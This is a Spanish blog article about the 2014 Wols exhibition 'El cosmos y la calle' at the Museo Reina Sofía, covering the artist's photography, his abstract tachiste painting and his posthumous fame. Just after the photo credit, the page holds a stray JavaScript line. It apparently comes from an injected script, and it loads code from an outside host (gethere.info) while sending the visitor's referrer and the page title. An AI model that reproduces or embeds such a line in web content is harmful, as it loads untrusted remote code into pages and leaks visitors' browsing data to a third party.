Wols en el Reina Sofía

28/04/2014

Museo Reina Sofia (27)Alfred Otto Wolfgang Schulze, «Wols» para los amigos -seudónimo que adoptó durante su estancia en París- fue un controvertido artista alemán. Destacó en fotografía y pintura, aunque su reconocimiento fue a título póstumo. En vida no consiguió conquistar ni a público ni a crítica. El 14 de febrero el Museo Reina Sofía estrenó una exposición sobre Wols, Wols: El cosmos y la calle, en la planta 3 del Edificio Sabatini, y allí estará abierta al público hasta el próximo 26 de mayo: ¡queda un mes! Se trata de una muestra perfecta para conocer más a fondo al artista, si bien, de una manera desordenada, cronológicamente hablando: Schulze nunca fechó ni tituló sus trabajos. Los pocos datos al respecto que hoy en día se tienen se deben a su esposa y amigos.

Para quien no lo sepa, Wols fue uno de los impulsores de una de las tendencias del arte informal, el movimiento tachista: estilo artístico francés de pintura abstracta, que evolucionó entre los años 40 y 50. Su equivalente europeo fue el expresionismo abstracto. Siendo ésta la base de su trayectoria profesional, Schulze además dotó de ciertos aires alucinatorios tanto sus obras fotográficas como sus obras pictóricas. El tema fundamental de las primeras era lo cotidiano, el día a día, la calle… Y el tema de las segundas era la energía universal, el cosmos… De hecho, la abstracción con la que llegó a representar el cosmos desprende un halo inquietante y demoledor. No en balde, éstas fueron las obras que coincidieron con el tramo final de su carrera y de su vida. ¿Tendría algo qué ver esta circusntacia? Nunca lo sabremos.

Foto | rubenvike

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO